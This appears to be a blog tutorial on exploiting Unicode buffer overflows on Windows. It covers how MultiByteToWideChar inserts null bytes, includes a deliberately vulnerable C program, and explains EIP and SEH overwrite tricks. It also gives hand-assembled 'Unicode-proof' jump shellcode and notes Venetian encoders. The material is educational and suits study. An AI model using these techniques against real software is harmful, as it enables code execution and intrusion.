EIP = 0×00410041 ?? Exploiting Unicode Buffer Overflows
Hello all =)
I’m writing this post in English (a poor English) because perhaps I will do some references to this article on others sites. But you can download the French version here : Unicode Buffer Overflows Exploitation – French Version.pdf
Introduction :
Maybe you’ve already encountered few problems when trying to exploit a buffer overflow, EIP = 0×00410041 for example while you have entered a string like this one : « AAAA… ». Maybe you don’t, but I think very interesting to understand when can we be confronted to this case and what it is due to.
Understanding Unicode Strings :
First of all I’m going to present you briefly the mechanism of Unicode Strings. Unicode strings have been created to ensure that all the languages can be used from any country without problems of transliteration. For example the Arabic characters are different from our. You understand that this chain مهمءضك cannot be converted according to the ASCII codes we know. With Unicode strings it is possible to use any kind of characters. You can have a great overview of Unicode characters here.
I won’t explain you more about Unicode Strings, I’m now going to show you how to use it.
Using Unicode Strings :
In C, it exists a list of functions to manipulate Unicode Strings on Windows : Unicode Functions.
Let us take a look to the conversion ASCII/Unicode functions :
-
- MultiByteToWideChar() : ASCII -> Uniocde :
int MultiByteToWideChar( UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar );
-
- WideCharToMultiByte() : Unicode -> ASCII :
int WideCharToMultiByte( UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar );
I call your attention to the field CodePage :
- CodePage
- [in] Code page used to perform the conversion.
You can set this parameter to any code page that is installed or available in the system. You can also specify one of the values shown in the following table.
Value Description CP_ACP ANSI code page CP_MACCP Not supported CP_OEMCP OEM code page CP_SYMBOL Not supported CP_THREAD_ACP Not supported CP_UTF7 UTF-7 code page CP_UTF8 UTF-8 code page When SYSGEN_LOCUSA is set, only the 1252 and 437 code pages are supported.
To create an image that has very limited locale support, specify the image with SYSGEN_CORELOC and put the necessary locales for the image into Public\Common\Oak\Files\Nlscfg.inf.
When converting an ASCII chain to Unicode, the result will depend of the Code Page used. An example of conversion :
#include #include int main(int argc, char *argv[]) { wchar_t wcStr[56]; char cStr[56]; memcpy(cStr, "\xB0\x42\x43\x44", 4); MultiByteToWideChar(CP_OEMCP, 0, &cStr, 4, &wcStr, SIZE); printf("%ws", wcStr); printf("\n\n"); system("pause"); return 0; }
Here I’m using the OEM code page.
Now let us have a look to the memory :
It seems that each character is followed by a NULL BYTE. In fact « ABCD »=41 42 43 44 becomes « A.B.C.D »=4100 4200 4300 4400.
Actually, characters less than 0×7F will follow this principle. But if you use a character above to 0×7F, it won’t necessarily be the case.
Indeed 0xB0=0×9125 in the OEM code page. You can find a great table of conversion here : Pratical Win32 and Unicode exploitation.
Ok now what about Unicode buffer overflows ?
Redirecting the program flow :
Rewriting the RET address :
This is an example of a program which will crash because of a stack overflow with Unicode strings :
#include #include #define SIZE 56 int main(int argc, char *argv[]) { wchar_t wcBofMe[1]; wchar_t wcStr[SIZE]; char cStr[SIZE]; memcpy(cStr, "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41", SIZE); MultiByteToWideChar(CP_OEMCP, 0, &cStr, SIZE, &wcStr, SIZE); wcscpy(wcBofMe, wcStr); // Will crash return 0; }
When running this program, it crash and EIP is 0×41004100 :
Well we clearly see that we can overwrite only 2 bytes of the 4 that constitute the EIP register. What is a real problem, it is difficult to find a JMP ESP for example at an address like 0xyy00zz00.
But remember what I said, some bytes (>0×7F) have special translation in Unicode with the OEM code page. For example 0xC0 = 0×1425. So I’ve modified my chain and I obtain :
So it means that we can actually overwrite the 4 bytes of the EIP. There is a plugin for OllyDBG which allow you to find addresses with unicode format (0xyy00zz00) of JMP ESP, CALL ESP, … It is OllyUNI. And another plugin exists for Immunity Debugger : pvefindaddr.
Seh rewriting :
We know that exists an other method to redirect the program flow : the SEH Overwriting. Well with Unicode string, the principle will be the same (Overwrite SEH Handler address with a pointer to a POP POP RET instruction sequence) but we won’t be able to use a JMP SHORT. Writing a JMP SHORT with Unicode string is almost impossible. And it depend to much of the Code Page used.
So the principle will be to don’t make a JMP SHORT but let the program execute normally the instructions contained in Next SEH and SEH Handler hoping it won’t crash. Then, if this instructions don’t cause any harm, we will be able to execute a shellcode situated after the SEH structure. I know it is a bit difficult to understand so just look at this schema :
For steps 1 and 2 there is no problem.
But the step 3 is more tricky and require two conditions :
-
-
- The address of Next SEH when executed mustn’t cause a harm.
- Similarly, the address of SEH Handler mustn’t raise an exception when executed.
-
I give you an example of address which can cause a bug :0×41560020
0020 ADD BYTE PTR DS:[EAX],AH 56 PUSH ESI 41 INC ECX
Here, if EAX contains a value like 0×00000000, an exception « Access violation » is raised when executing
ADD BYTE PTR DS:[EAX],AH
Exploiting Unicode Buffer Overflows :
RET on ASCII shellcode :
When we convert an ASCII string to an Unicode one, it still stay the ASCII string in memory. So if we can jump on it, we will be able to execute a « normal » shellcode. But how can we make a jump ? As I told you before, it is almost impossible to make a jump with a unicode shellcode…
Well we have to find another solution. I offer you to read this paper dealing with the instructions we can use with unicode constraints : Building IA32 ‘Unicode-Proof’ Shellcodes.
In my case I want to jump to the address 0×0022FD88 which points to my ASCII shellcode.
So I will use this unicode shellcode :
0040139D B8 00220000 MOV EAX,2200 ; EAX = 00002200 004013A2 50 |PUSH EAX 004013A3 4C DEC ESP 004013A4 58 POP EAX ; EAX = 002200?? 004013A5 05 00FD0000 ADD EAX,0FD00 ; EAX = 0022FD?? 004013AF B0 00 MOV AL,0 ; EAX = 0022FD00 004013AA B9 00880000 MOV ECX,8800 ; ECX = 00008800 004013B1 00E8 ADD AL,CH ; EAX = 0022FD88 00401284 50 PUSH EAX 00401285 C3 RETN
Well if I can give you some advices, when you have an address like 0xTTUUVVWW, begin by set TT, then UU, … It is really less complicated.
Then it is important to understand how to « play » with the ESP register and POP/PUSH instructions. Now if you consider my string :
B8 00 22 00 00 50 4C 58 05 00 FD 00 00 B0 00 B9 00 88 00 00 00 E8, you see that there is no null byte between 50 and 4C for example.
Well it is not critical. In fact there are instructions which opcodes look like this : 00 XX 00. In my case I will use :
004013C6 0072 00 ADD BYTE PTR DS:[EDX],DH
So I obtain this shellcode :
0040139D B8 00220000 MOV EAX,2200 ; EAX = 00002200 004013A2 50 |PUSH EAX 004013C6 0072 00 ADD BYTE PTR DS:[EDX],DH 004013A3 4C DEC ESP 004013C6 0072 00 ADD BYTE PTR DS:[EDX],DH 004013A4 58 POP EAX ; EAX = 002200?? 004013C6 0072 00 ADD BYTE PTR DS:[EDX],DH 004013A5 05 00FD0000 ADD EAX,0FD00 ; EAX = 0022FD?? 004013AF B0 00 MOV AL,0 ; EAX = 0022FD00 004013AA B9 00880000 MOV ECX,8800 ; ECX = 00008800 004013B1 00E8 ADD AL,CH ; EAX = 0022FD88 004013C6 0072 00 ADD BYTE PTR DS:[EDX],DH 00401284 50 PUSH EAX 004013C6 0072 00 ADD BYTE PTR DS:[EDX],DH 00401285 C3 RETN
Now my string is ok. We just have to build an ASCII shellcode.
Using a decoder :
But imagine the case you can’t return on your ASCII string. You will be obliged to make an unicode shellcode. But writing a shellcode in unicode is too much difficult. Nevertheless it exists a technique based on Venetian Shellcodes. There are some tools like alpha2 which encode an ASCII Shellcode to a Unicode one which will be decoded by a decoder (unicode compatible). After the decoder has been executed we just have to jump on the original shellcode. But this method require one condition :
-
-
- A least one register and it is better two, EAX and ECX for example, have to point one to the encoded shellcode and the other to a writeable memory space. However it is possible with just one register that points to the encoded shellcode which will be modified by itself.
-
Nonetheless you will ask me why do we need a register which points to the shellcode ?? Well, as I told you, there are few instructions which opcodes looks like this : 00 XX 00. That is instructions we can use. And these instructions are similar to this one I’ve already used :
0072 00 ADD BYTE PTR DS:[EDX],DH
In this case, if EDX points to our shellcode, we are able to modify it via DH.
Here is a little list of instructions of this kind :
CPU Disasm Address Hex dump Command Comments 00401220 0060 00 ADD BYTE PTR DS:[EAX],AH 00401223 0061 00 ADD BYTE PTR DS:[ECX],AH 00401226 0062 00 ADD BYTE PTR DS:[EDX],AH 00401229 0063 00 ADD BYTE PTR DS:[EBX],AH 0040123E 006A 00 ADD BYTE PTR DS:[EDX],CH 00401241 006B 00 ADD BYTE PTR DS:[EBX],CH 00401253 0071 00 ADD BYTE PTR DS:[ECX],DH 00401256 0072 00 ADD BYTE PTR DS:[EDX],DH 00401259 0073 00 ADD BYTE PTR DS:[EBX],DH 00401262 0076 00 ADD BYTE PTR DS:[ESI],DH 00401265 0078 00 ADD BYTE PTR DS:[EAX],BH 00401268 0079 00 ADD BYTE PTR DS:[ECX],BH 0040126B 007A 00 ADD BYTE PTR DS:[EDX],BH 0040126E 007B 00 ADD BYTE PTR DS:[EBX],BH 00401277 007E 00 ADD BYTE PTR DS:[ESI],BH 0040127A 007F 00 ADD BYTE PTR DS:[EDI],BH
These instructions can be very useful when adjusting the unicode shellcode for make a jump to the ascii string (previous method).
Conclusion
I’m sorry to don’t illustrate my talk but I don’t have the time. Maybe I will give you some examples soon in a post.
This article was a very short approach to the Unicode Buffer Overflows, so I will end by offering you an excellent paper about this topic,really more comprehensive : Exploit writing tutorial part 7 : Unicode – from 0×00410041 to calc by Peter Van Eeckhoutte.
Some Unicode Buffer Overflows exploits :
Aucun commentaire pour l'instant